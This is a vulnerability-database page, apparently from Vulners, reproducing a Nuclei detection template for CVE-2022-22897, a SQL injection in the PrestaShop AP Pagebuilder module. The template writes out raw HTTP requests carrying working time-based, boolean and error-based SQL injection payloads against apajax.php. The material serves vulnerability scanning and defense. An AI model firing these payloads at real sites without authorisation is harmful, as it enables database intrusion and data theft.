Lucene search
K

PrestaShop AP Pagebuilder <= 2.4.4 - SQL Injection

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 205 Views

PrestaShop AP Pagebuilder <= 2.4.4 - SQL Injection allows unauthenticated attackers to exfiltrate database data and execute arbitrary SQL queries leading to unauthorized accessand data leakage. Upgrade to v2.4.5 or later to mitigate the vulnerability

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
PrestaShop Ap Pagebuilder 2.4.4 SQL Injection Vulnerability
25 Aug 202200:00
zdt
ATTACKERKB
CVE-2022-22897
29 Aug 202206:15
attackerkb
Circl
CVE-2022-22897
1 Jan 202500:00
circl
CNNVD
PrestaShop Ap Pagebuilder SQL注入漏洞
25 Aug 202200:00
cnnvd
CVE
CVE-2022-22897
29 Aug 202200:00
cve
Cvelist
CVE-2022-22897
29 Aug 202200:00
cvelist
NVD
CVE-2022-22897
29 Aug 202206:15
nvd
OSV
CVE-2022-22897
29 Aug 202206:15
osv
Packet Storm
PrestaShop Ap Pagebuilder 2.4.4 SQL Injection
25 Aug 202200:00
packetstorm
Prion
Sql injection
29 Aug 202206:15
prion
Rows per page
id: CVE-2022-22897

info:
  name: PrestaShop AP Pagebuilder <= 2.4.4 - SQL Injection
  author: mastercho
  severity: critical
  description: |
    A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
  remediation: |
    Upgrade PrestaShop Ap Pagebuilder to version 2.4.5 or later to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-22897
    - https://packetstormsecurity.com/files/cve/CVE-2022-22897
    - https://security.friendsofpresta.org/modules/2023/01/05/appagebuilder.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-22897
    cwe-id: CWE-89
    epss-score: 0.10814
    epss-percentile: 0.95301
    cpe: cpe:2.3:a:apollotheme:ap_pagebuilder:*:*:*:*:*:prestashop:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: apollotheme
    product: ap_pagebuilder
    framework: prestashop
    shodan-query: http.component:"prestashop"
  tags: time-based-sqli,cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme,vkev,vuln

http:
  - raw:
      - |
        GET /modules/appagebuilder/config.xml HTTP/1.1
        Host: {{Hostname}}

      - |
        @timeout: 20s
        POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}
        X-Requested-With: XMLHttpRequest

        leoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0)

      - |
        POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}
        X-Requested-With: XMLHttpRequest

        leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6644=6644-- yMwI

      - |
        POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}
        X-Requested-With: XMLHttpRequest

        leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6643=6644-- yMwI

      - |
        @timeout: 20s
        POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}
        X-Requested-With: XMLHttpRequest

        leoajax=1&pro_add=if(now()=sysdate()%2Csleep(6)%2C0)

      - |
        POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}
        X-Requested-With: XMLHttpRequest

        leoajax=1&pro_add=-{{rand_int(0000, 9999)}})

    matchers-condition: or
    matchers:
      - type: dsl
        name: time-based
        dsl:
          - 'duration_2>=6'
          - 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
        condition: and

      - type: dsl
        name: time-based
        dsl:
          - 'duration_5>=6'
          - 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
        condition: and

      - type: dsl
        name: blind-based
        dsl:
          - 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
          - 'contains(body_3, "content") && contains(body_3, "{{Hostname}}")'
          - '!contains(body_4, "content") && !contains(body_4, "{{Hostname}}")'
          - 'len(body_3) > 200 && len(body_4) <= 22'
        condition: and

      - type: dsl
        name: error-based
        dsl:
          - 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
          - 'contains(body_6, "You have an error in your SQL syntax")'
        condition: and

    extractors:
      - type: regex
        name: version
        part: body_1
        internal: true
        group: 1
        regex:
          - "<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"
# digest: 4b0a00483046022100ab9c53725a34727da82073ea2424cd5dbf0351e4376a233db2c850232b236482022100c7871539f79aa5ae943d2f2b01f945ea4d9655cf6b6f6229747d6ca982a9e706:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
EPSS0.10814
205